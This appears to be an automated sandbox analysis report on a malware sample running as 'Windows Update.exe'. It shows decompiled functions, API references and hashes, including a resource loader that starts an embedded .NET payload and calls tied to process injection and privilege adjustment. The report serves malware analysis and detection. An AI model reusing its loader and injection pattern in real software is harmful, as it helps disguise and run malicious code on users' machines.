                                                                                              0x6f7099c5
                                                                                              0x6f7099c8
                                                                                              0x6f7099cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709ab5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7096a8
                                                                                              0x6f7096aa
                                                                                              0x6f7096b2
                                                                                              0x6f7096ba
                                                                                              0x6f7096bd
                                                                                              0x6f7096c0
                                                                                              0x6f7096c2
                                                                                              0x6f7096c5
                                                                                              0x6f7096c6
                                                                                              0x6f7096c9
                                                                                              0x6f7096cb
                                                                                              0x6f7096cc
                                                                                              0x6f7096d1
                                                                                              0x6f7096d6
                                                                                              0x6f7096dc
                                                                                              0x6f7096df
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7096e7
                                                                                              0x6f7096e9
                                                                                              0x6f7096ed
                                                                                              0x6f7096f9
                                                                                              0x6f7096fc
                                                                                              0x6f7096ff
                                                                                              0x6f709701
                                                                                              0x6f709704
                                                                                              0x6f709705
                                                                                              0x6f709708
                                                                                              0x6f70970a
                                                                                              0x6f70970b
                                                                                              0x6f709710
                                                                                              0x6f709715
                                                                                              0x6f70971b
                                                                                              0x6f70971e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7095a4
                                                                                              0x6f709adf
                                                                                              0x6f709adf

                                                                                              APIs
                                                                                              Strings
                                                                                              • no unmarshaller for embedded type %02x, xrefs: 6F709A91
                                                                                              • embedded complex (size=%d) => %p, xrefs: 6F709A19
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: embedded complex (size=%d) => %p$no unmarshaller for embedded type %02x
                                                                                              • API String ID: 2102423945-1287812044
                                                                                              • Opcode ID: 653bc96e0c261cb4364b500421623872223080770ca63d2c4f942b938896a4f2
                                                                                              • Instruction ID: e6fdc2a956316731dd006e4525254392d83b89ce65e7480c1acaeaab10f4cc1d
                                                                                              • Opcode Fuzzy Hash: 653bc96e0c261cb4364b500421623872223080770ca63d2c4f942b938896a4f2
                                                                                              • Instruction Fuzzy Hash: E13127F5900249AFCB08CF98C990AEF7BB5BF89311F148169F9559B344D330EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F7046B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F7046B0(intOrPtr _a4, intOrPtr* _a8, void* _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v12;
				void* _t62;
				void* _t65;

				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_a12 = _a12 + 1;
				_v12 = E6F70F410(_a4,  &_a12);
				0x6f700000("unmarshalled discriminant %x\n", _v12);
				_t65 = _t62 + 0x24;
				_a12 =  *_a12 + _a12;
				_v8 =  *_a12;
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					 *_a8 =  *0x6f700000(_a4, _v8 & 0x0000ffff);
				}
				if((_a16 & 0x000000ff) != 0) {
					E6F710730( *_a8, 0, _v8 & 0x0000ffff);
					_t65 = _t65 + 0xc;
				}
				return E6F70ED20(_a4, _a8, _v12, _a12, 0);
			}







                                                                                              0x6f7046cc
                                                                                              0x6f7046da
                                                                                              0x6f7046ed
                                                                                              0x6f7046f9
                                                                                              0x6f7046fe
                                                                                              0x6f70470a
                                                                                              0x6f704713
                                                                                              0x6f70471d
                                                                                              0x6f704727
                                                                                              0x6f704727
                                                                                              0x6f704731
                                                                                              0x6f704745
                                                                                              0x6f704745
                                                                                              0x6f70474d
                                                                                              0x6f70475c
                                                                                              0x6f704761
                                                                                              0x6f704761
                                                                                              0x6f704781

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$unmarshalled discriminant %x
                                                                                              • API String ID: 2102423945-139691638
                                                                                              • Opcode ID: 866ace5b2a8c3aad293fc44906f8be01b14eff57a267f0bfd9eba5d95c7b48c2
                                                                                              • Instruction ID: c632c75bc51e35a309a86f1a514b5fa6a3e17b7fe418b824dc3b993274ccebd3
                                                                                              • Opcode Fuzzy Hash: 866ace5b2a8c3aad293fc44906f8be01b14eff57a267f0bfd9eba5d95c7b48c2
                                                                                              • Instruction Fuzzy Hash: 8A217CF9600249ABCB04DFA4DD40EAF3BB9BF49205F048559FD188B280E731EA60CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70AFA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6F70AFD7
                                                                                              • pointer is the same as the buffer, xrefs: 6F70AFFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u$pointer is the same as the buffer
                                                                                              • API String ID: 4104443479-2199830383
                                                                                              • Opcode ID: d93e3f37e164f9ac7ddbda42d8cdbba1d7fc5049a781744baeabc4addac02e25
                                                                                              • Instruction ID: b5db112d7501beebdabbe8f681436423abd71075841aee6005f97618a43c126b
                                                                                              • Opcode Fuzzy Hash: d93e3f37e164f9ac7ddbda42d8cdbba1d7fc5049a781744baeabc4addac02e25
                                                                                              • Instruction Fuzzy Hash: C611F8B9200209AFCB04DF48C990D5ABBA6BF88354F19C658FC0D8B346D731FA91CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: Windows Update.exe PID: 6244 Parent PID: 5844 Windows Update.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 02557920, Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.386114351.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6d9a3349837bf2df1354a42019ccde984efe395a38e208ecbc8fb28f0fb84d28
                                                                                              • Instruction ID: e0f44439201967bb65230acd5b1adf07cfdd4673517f21d2862c2d8f160e9bb9
                                                                                              • Opcode Fuzzy Hash: 6d9a3349837bf2df1354a42019ccde984efe395a38e208ecbc8fb28f0fb84d28
                                                                                              • Instruction Fuzzy Hash: D4329074941229CFDB65DF24C894BEDB7B2BF4A304F5085EAD809AB250DB319E85CF84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0B20, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: aba6f2e666d3b134324b3682b0282aa841c23778ab367fd1cf1b892284f3ebbd
                                                                                              • Instruction ID: a8f7471f63427deed5f9e1ffcd8bdc8eda18816af95421991de527d8001c7af6
                                                                                              • Opcode Fuzzy Hash: aba6f2e666d3b134324b3682b0282aa841c23778ab367fd1cf1b892284f3ebbd
                                                                                              • Instruction Fuzzy Hash: 7C21B5B54097846FE7128F54DC85F96BFA8EF42328F0884EAE9449F193E374A905C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0F3B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: 9de6f94628f61913c42d4f22e009bad6a6867ff5aa41a0f8c9a20d150520eeaf
                                                                                              • Instruction ID: 450d0359e8b3786acc403fbac3123c5fd3f04d00a48545f1ebaa69a3b17eb57e
                                                                                              • Opcode Fuzzy Hash: 9de6f94628f61913c42d4f22e009bad6a6867ff5aa41a0f8c9a20d150520eeaf
                                                                                              • Instruction Fuzzy Hash: 5D2191B55093846FE7128F65DC84F96BFB8EF06310F1884EAE984CF152D264A449CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4F43, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04BD4FC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdjustPrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 2874748243-0
                                                                                              • Opcode ID: 44423e6d9a5ff591ea648c10b4d1cc12dd9ba5658919a38fe0f24c4d265fe063
                                                                                              • Instruction ID: e7099c3d3364b068cf14aa5ae65d2ccb79d18fcc778b5f1a7d23fcbff8a47cd4
                                                                                              • Opcode Fuzzy Hash: 44423e6d9a5ff591ea648c10b4d1cc12dd9ba5658919a38fe0f24c4d265fe063
                                                                                              • Instruction Fuzzy Hash: FD21A3755097C49FDB228F25DC44B52BFB4EF06310F0884EAE9898F163E371A908CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5932, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04BD59B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationQuerySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3562636166-0
                                                                                              • Opcode ID: aff1804574e218483a4f8aeb52d9e27a810fc7b4c3da59407656cae4f1706a61
                                                                                              • Instruction ID: 3faf8b07bfe008a21a2a22e2b4cd1511d9b125691341ae2c3062a482a4c70299
                                                                                              • Opcode Fuzzy Hash: aff1804574e218483a4f8aeb52d9e27a810fc7b4c3da59407656cae4f1706a61
                                                                                              • Instruction Fuzzy Hash: 7A216D714093C49FDB128F219854AA2BFB0EF16224F1C84DEE9C84F153E266A559DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0F6E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: 779ea95c3f949e07a28ed6fb60703758e95ea1044e72bc80ac1a25a94d18511e
                                                                                              • Instruction ID: e67d35d7539a634baaea9005220ea44c45924f00a93f80212f9770d82c3ce608
                                                                                              • Opcode Fuzzy Hash: 779ea95c3f949e07a28ed6fb60703758e95ea1044e72bc80ac1a25a94d18511e
                                                                                              • Instruction Fuzzy Hash: 201190B1504204AEEB20DF59DC84F96FBA8EF44710F14C4AAEA499B241E674E4048B71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5B81, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04BD5BEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3527976591-0
                                                                                              • Opcode ID: ad55f228409a154124e4bcc95d217c6adf21af25392d41199bd234f64fc4246a
                                                                                              • Instruction ID: 125e5190195042a64f348acd29370adee5afd114b03861be26ac6d63e53e409c
                                                                                              • Opcode Fuzzy Hash: ad55f228409a154124e4bcc95d217c6adf21af25392d41199bd234f64fc4246a
                                                                                              • Instruction Fuzzy Hash: 4E117C72408384AFEB228F55DC44BA2FFB4EF46220F0885DAED858F112D375A459DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0B5E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: f7dcccb298006c2c322acf7434f6c4e0ef5374a4372f14294624b3d0e70c46e0
                                                                                              • Instruction ID: 6143510af2dffe4c214924f1acb14aa429fe0f69ea172400c155bedb34fdf5eb
                                                                                              • Opcode Fuzzy Hash: f7dcccb298006c2c322acf7434f6c4e0ef5374a4372f14294624b3d0e70c46e0
                                                                                              • Instruction Fuzzy Hash: A211E971504204AFEB11DF55DC84F6AFBA8EF44324F1484E6EE499F241E674A444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4F7A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04BD4FC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdjustPrivilegesToken
                                                                                              • String ID:
                                                                                              • API String ID: 2874748243-0
                                                                                              • Opcode ID: c598b225f5769f29ea28ed1756ab627409665f9d474632ef0702fb8219d5fb0e
                                                                                              • Instruction ID: 16f6b604329f444babbb66dc2cb07bcbf392640b7229b3f0cfbe5b8ad6bed11d
                                                                                              • Opcode Fuzzy Hash: c598b225f5769f29ea28ed1756ab627409665f9d474632ef0702fb8219d5fb0e
                                                                                              • Instruction Fuzzy Hash: 54115E755002449FDB208F55D844B56FBE4EF04320F08C4AAED498B662E371F418DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5BAE, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04BD5BEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3527976591-0
                                                                                              • Opcode ID: 0178fca1e0b7bd13ee8304a09e58ce703ff8f1b47c39294bf536245875df6394
                                                                                              • Instruction ID: 9d08b94186dafbeb9b991f08ff765f55c3adf654af10f149f136bcf0d0ae0994
                                                                                              • Opcode Fuzzy Hash: 0178fca1e0b7bd13ee8304a09e58ce703ff8f1b47c39294bf536245875df6394
                                                                                              • Instruction Fuzzy Hash: 7F018C71504244AFDB308F55E844B56FFE0EF04320F08C4AADD498B216E275A058DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB07E, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: 1cba8e82b971f6c01a1a615d9ee191ed23749a227cde37311380032aff3d68f8
                                                                                              • Instruction ID: 8a7c2aa471d65cb1c724a8ce08243dc3c3bbeda9ecc144f6fd950df038bf66de
                                                                                              • Opcode Fuzzy Hash: 1cba8e82b971f6c01a1a615d9ee191ed23749a227cde37311380032aff3d68f8
                                                                                              • Instruction Fuzzy Hash: EE01BC718102409FEB20CF55E885B66FFA0EF44320F18C4AEED998F252D376A409CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5B06, Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 04BD5B3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: SectionUnmapView
                                                                                              • String ID:
                                                                                              • API String ID: 498011366-0
                                                                                              • Opcode ID: f3eaf91c0eec750e0ca32e91fa6af45d2c893e168ef2b8f862efd63b656f37de
                                                                                              • Instruction ID: 6f560828817e7928ee99b761e44fe179fdee706e21c4f66627f70e421a65f499
                                                                                              • Opcode Fuzzy Hash: f3eaf91c0eec750e0ca32e91fa6af45d2c893e168ef2b8f862efd63b656f37de
                                                                                              • Instruction Fuzzy Hash: 7D018B71904244EFEB20CF15E884B65FFA4EF44220F08C4EADD498F242E275A408CBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5976, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04BD59B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationQuerySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3562636166-0
                                                                                              • Opcode ID: ac0e020c7802ac9b4312a4d29e4ae8e276f75242442148c3f3e0c983a755ef43
                                                                                              • Instruction ID: 848ab80fd233b0d40e417205020e1f71d90becddb13f4cffdc65a24f95870652
                                                                                              • Opcode Fuzzy Hash: ac0e020c7802ac9b4312a4d29e4ae8e276f75242442148c3f3e0c983a755ef43
                                                                                              • Instruction Fuzzy Hash: 0301AD75500304AFDB308F15D884B25FFA0FF54320F18C4DADD890B256E279A418DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                                                                              0x00401e22
                                                                                              0x00401e28

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00001E29,00401716), ref: 00401E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                                              • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                                                                                              0x0040149f
                                                                                              0x004014a5
                                                                                              0x004014a9
                                                                                              0x004014ec
                                                                                              0x004014ee
                                                                                              0x004014ee
                                                                                              0x004014b7
                                                                                              0x004014bb
                                                                                              0x004014c7
                                                                                              0x004014cd
                                                                                              0x004014d3
                                                                                              0x004014d8
                                                                                              0x004014e0
                                                                                              0x004014e0
                                                                                              0x004014d8
                                                                                              0x004014e6
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                                              • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 0040149F
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                                              • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                                              • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                                                • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                                              • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                                              • ExitProcess.KERNEL32 ref: 004014EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                              • String ID: v2.0.50727
                                                                                              • API String ID: 2372384083-2350909873
                                                                                              • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                              • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                                              • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                              • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD335D, Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetAdaptersAddresses.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD32F5
                                                                                              • GetPerAdapterInfo.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD33E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdapterAdaptersAddressesInfo
                                                                                              • String ID:
                                                                                              • API String ID: 4108532965-0
                                                                                              • Opcode ID: 12a132aa8eb3807a90a16e5622604203610fb9f5883b5ea9004d7260ba8db84b
                                                                                              • Instruction ID: 7132c71b30d1e8c696a948ef7eaacec6a2127913649a5f4d17f8fc404bccfd1a
                                                                                              • Opcode Fuzzy Hash: 12a132aa8eb3807a90a16e5622604203610fb9f5883b5ea9004d7260ba8db84b
                                                                                              • Instruction Fuzzy Hash: 7C31D276409344AFEB118F15DC85F66FFB8EF45320F0885EAED498B252D325A508CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                                                                              0x004055c5
                                                                                              0x004055cf
                                                                                              0x004055d3
                                                                                              0x004055e4
                                                                                              0x004055e8
                                                                                              0x004055ed
                                                                                              0x004055f3
                                                                                              0x004055f8
                                                                                              0x004055fd
                                                                                              0x00405602
                                                                                              0x00405609
                                                                                              0x004055d5
                                                                                              0x004055d5
                                                                                              0x004055d5
                                                                                              0x00405614

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free
                                                                                              • String ID:
                                                                                              • API String ID: 3328510275-0
                                                                                              • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                              • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
